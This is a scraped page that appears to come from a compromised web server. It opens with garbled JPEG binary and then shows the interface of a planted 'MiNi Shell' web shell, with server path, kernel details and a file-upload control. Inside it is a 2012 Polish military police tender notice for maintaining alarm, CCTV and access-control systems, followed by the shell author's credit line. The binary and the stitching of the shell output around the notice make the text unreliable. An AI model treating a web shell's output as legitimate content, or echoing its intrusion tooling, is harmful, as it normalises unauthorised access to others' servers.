JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/232785-N-2012.html

<p class="kh_header"><b>Warszawa: USŁUGA KONSERWACJI I SERWISU ZINTEGROWANEGO SYSTEMU OCHRONY ELEKTRONICZNEJ - ANDOVER, SYSTEMÓW ALARMOWYCH, TELEWIZJI PRZEMYSŁOWEJ ORAZ ZESPOŁÓW I INSTALACJI ELEKTRYCZNYCH 
W BUDYNKACH OSŻW I CSŻW MIŃSK MAZOWIECKI ORAZ W BUDYNKACH OZŻW WARSZAWA ZNAJDUJĄCYCH SIĘ NA TERENIE KK 1023 W MIŃSKU MAZOWIECKIM</b><br>
<b>Numer ogłoszenia: 232785 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Oddział Zabezpieczenia Żandarmerii Wojskowej , ul. Jana Ostroroga 35, 01-163 Warszawa, woj. mazowieckie, tel. 22 685 32 47, faks 22 685 30 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA KONSERWACJI I SERWISU ZINTEGROWANEGO SYSTEMU OCHRONY ELEKTRONICZNEJ - ANDOVER, SYSTEMÓW ALARMOWYCH, TELEWIZJI PRZEMYSŁOWEJ ORAZ ZESPOŁÓW I INSTALACJI ELEKTRYCZNYCH 
W BUDYNKACH OSŻW I CSŻW MIŃSK MAZOWIECKI ORAZ W BUDYNKACH OZŻW WARSZAWA ZNAJDUJĄCYCH SIĘ NA TERENIE KK 1023 W MIŃSKU MAZOWIECKIM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Urządzenia podlegające konserwacji:
Zestawienie ilościowe urządzeń wbudowanych w system alarmowy i system telewizji przemysłowej funkcjonujący w OSŻW i CSŻW w Mińsku Mazowieckim
SYSTEM ALARMOWY OCHRONY OBIEKTÓW
Centrala Lokalnego Systemu Monitorującego LSM - 256  - 1kpl.
Podcentrala MLSM - 8	 29 + 2szt.
Czujka wewnętrzna	157 + 9szt.
Aktywna kurtyna podczerwieni 250Q/AB   6szt.
Aktywna bariera podczerwieni DARWIN    2szt.
Czujka ppoż. DS-284 TH	11 + 2szt.
Czujka ppoż. ADR 20 R	14szt.	
Manipulator (szyfrator) MA-0896     20 + 2szt.
Manipulator (szyfrator) 	2 szt.
Sygnalizator wewnętrzny SPW 100	19 + 2szt.
Sygnalizator zewnętrzny SPL 2010	7szt.
Odbiornik sygnałów napadowych AN 200H	 9szt.
Nadajnik sygnałów napadowych AN 200pil	13 + 1szt.
Separator SP LSM-4	7szt.
Tablica diodowa TLSM		6szt.
Pulsator optyczny	29szt.
Akumulator 17/Ah	22 + 2szt.
Zasilacz ZI 3014	22 + 2szt.
Drukarka termiczna Kafka R	1szt.
SYSTEM TELEWIZJI PRZEMYSŁOWEJ
Monitor kolor LCD 17  Neovo  	4szt.
Kamera wewnętrzna TV przemysłowej z oprzyrządowaniem	1kpl.
Zestawienie ilościowe urządzeń wbudowanych w system alarmowy, telewizji przemysłowej, kontrolę dostępu oraz kanalizacji technicznej i instalacji elektrycznej będących na gwarancji do dnia 29.10.2013r funkcjonujący w OSŻW w Mińsku Mazowieckim
SYSTEM ALARMOWY OCHRONY OBIEKTÓW
Podcentrala MLSM - 8		13szt.
Czujka stłuczenia szyby AD 700AM	   8szt.
Czujka mikrofalowa kl. S, ARGUS -2		7szt.
Zewnętrzna bariera podczerwieni EL50RT 2PH		2kpl.
Czytnik zbliżeniowy kart zewnętrznych PRT-LT	2szt.
Manipulator kodowy MA 0896		8szt.
Tablica synoptyczna 	1szt.
Akumulator 38 Ah	4szt.
Akumulator 65 Ah	1szt.
Zasilacz 13,8V		1szt.
Zasilacz 13,8V Palko	6szt.
Zasilacz 13,8V/10A 	1szt.
Radiolinia napadowa Elmes, odbiornik + 2 piloty     6szt.
Moduł TLSM 16	2szt.
SYSTEM KONTROLI DOSTĘPU
Kontroler dostępu ACX series 5720 + moduł XPBD4 + oprogramowanie	  1kpl.
Czytnik ASR 702W	   4szt.
Zamek elektromechaniczny	  1szt.
Tripod Turnstile Auia.114.00.00.00.OM	    1szt.
Bramka wyjścia awaryjnego	1kpl
Bariera aluminiowa	  4,8m
Videokamera SHT-5088	1szt.
Videodomofon SHT-3305, monitor z klawiaturą, zasilacz systemowy	   4kpl.
Programator do kart AKPK10	 1szt.
Karta dostępu Mifare 1S50	500szt.
Drukarka termosublimacyjna DATACARD SP 25 PLUS do kart kontroli dostępu z oprogramowaniem	     1kpl.
Jednostka centralna serwera - serwer DELL POWEREDGE T110, klawiatura, drukarka HP DESKJET D1660, monitor 21		1kpl.
Komputer HP COMPAQ HDD320GB RAM 2GB, klawiatura, drukarka DESKJET 1650, monitor 21	1kpl.
Skaner Canon Wia Canoscan Lide 200		1szt.
Obudowa pulsar AWO 305		1szt.
Czujka kontaktronowa MC 470		1szt.
Przycisk ręczny wyjścia awaryjnego FA105-OP		2szt.
Switch 8 portów CISCO 10/100 Mbs		1szt.
SYSTEMY TELEWIZJI PRZEMYSŁOWEJ
Jednokanałowy nadajnik pasywny sygnału po skrętce, NP.OPTIVIA VOS P4	      14szt.
Kamera wewnętrzna dualna K2-N1215DNR	   4kpl.
Puszka hermetyczna	  4szt.
Odbiornik sygnału po skrętce, aktywny	    14szt.
Rozdzielacz pasywny sygnału video	    4szt.
Kamera zewnętrzna szybkoobrotowa PTZ SD60C07	    1kpl.
Telewizor 32, z uchwytem	1kpl.
Słup stalowy + korek do słupa + zaślepki + fundament prefabrykowany		8kpl.
Ogranicznik przepięć OPV1	8szt.
Obudowa blaszana		8szt.
Puszka hermetyczna IP		6szt.
Klawiatura obsługi kamery obrotowej i rejestratora NKB, SIMTEC 416H	1szt.
Rejestrator cyfrowy K2 5xxD1	     1szt.
KANALIZACJA TECHNICZNA
Studnia kablowa SKR 1 wraz z pokrywami	 12kpl.
Studnia kablowa SKR 2 wraz z pokrywami	14kpl.
Czujki otwarcia - kontaktron MC 370	    26szt.
Kable 	   3049,8m.
INSTALACJE ELEKTRYCZNE
Zespół UPS EVER powerline 20 3-3 z SZR	    1kpl.
Agregat prądotwórczy EST ENERGY  EMMS 35E 	   1szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu uznania spełnienia tego warunku Zamawiający żąda następujących dokumentów:
1.koncesja MSWiA;
2.autoryzacja w zakresie projektowania systemów alarmowych w klasie S;
3.świadectwo bezpieczeństwa przemysłowego minimum trzeciego stopnia;
4.wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia;
5.opłacona polisa od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu uznania spełnienia tego warunku Zamawiający żąda następujących dokumentów:
1.zaświadczenie o ukończeniu kursu projektowania systemów alarmowych kl. SA-4 dla minimum  jednej osoby;
2.zaświadczenie o ukończeniu kursu instalacji systemów alarmowych kl. SA-4 dla wszystkich osób
3.certyfikat odbycia szkoleń Continuum dla minimum jednej osoby
w zakresie:
- konfiguracja systemu,
- administrowanie systemu,
- kontrola dostępu,
- programowanie Plain English;
4.certyfikat autoryzacyjny uprawniający do obsługi systemu alarmowego LSM-256 dla minimum jednej osoby;
5.licencje pracowników zabezpieczenia technicznego I stopnia, dla wszystkich osób, w tym dla jednej osoby minimum licencję zabezpieczenia technicznego II stopnia; 
6.świadectwo kwalifikacyjne grupy E do 1 kV dla minimum jednej osoby;
7.poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych o klauzuli co najmniej POUFNE włącznie dla wszystkich osób;
8.zaświadczenie o przeszkoleniu z zakresu ochrony informacji niejawnej zgodnie 
z Ustawą z dnia 05 sierpnia 2010 r. o ochronie informacji niejawnych dla wszystkich osób;
9.aktualną informację z Krajowego Rejestru Karnego dla wszystkich osób</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu uznania spełnienia tego warunku Zamawiający żąda następujących dokumentów:
1.zaświadczenie o ukończeniu kursu projektowania systemów alarmowych kl. SA-4 dla minimum  jednej osoby;
2.zaświadczenie o ukończeniu kursu instalacji systemów alarmowych kl. SA-4 dla wszystkich osób;
3.certyfikat odbycia szkoleń Continuum dla minimum jednej osoby
w zakresie:
- konfiguracja sytemu,
- administrowanie systemu,
- kontrola dostępu,
- programowanie Plain English;
4.certyfikat autoryzacyjny uprawniający do obsługi systemu alarmowego LSM-256 dla minimum jednej osoby;
5.licencje pracowników zabezpieczenia technicznego I stopnia, dla wszystkich osób, w tym dla jednej osoby minimum licencję zabezpieczenia technicznego II stopnia; 
6.świadectwo kwalifikacyjne grupy E do 1 kV dla minimum jednej osoby;
7.poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych o klauzuli co najmniej POUFNE włącznie dla wszystkich osób;
8.zaświadczenie o przeszkoleniu z zakresu ochrony informacji niejawnej zgodnie 
z Ustawą z dnia 05 sierpnia 2010 r. o ochronie informacji niejawnych dla wszystkich osób;
9.aktualną informację z Krajowego Rejestru Karnego dla wszystkich osób</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca posiada polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 20 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.autoryzacja w zakresie projektowania systemów alarmowych w klasie S;
2.świadectwo bezpieczeństwa przemysłowego minimum trzeciego stopnia;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustawy Pzp, w przypadkach niezależnych od Zamawiającego, zastrzega się dokonanie zmian treści umowy w zakresie:
1.terminu zawarcia umowy;
2.zmiany miejsca świadczenia;
3.z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
4.z powodu działań osób trzecich uniemożliwiających wykonanie prac, które 
to działania nie są konsekwencją winy którejkolwiek ze stron. 
Wszelkie zmiany dotyczące treści umowy dokonywane będą w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział Zabezpieczenia Żandarmerii Wojskowej
ul. Ostroroga 35, 01-163 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2012 godzina 09:00, miejsce: Kancelaria jawna w siedzibie Zamawiającego - budynek nr 18, pokój nr 126, lub przesłać na adres Zamawiającego: Oddział Zabezpieczenia Żandarmerii Wojskowej
ul. Ostroroga 35, 01-163 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com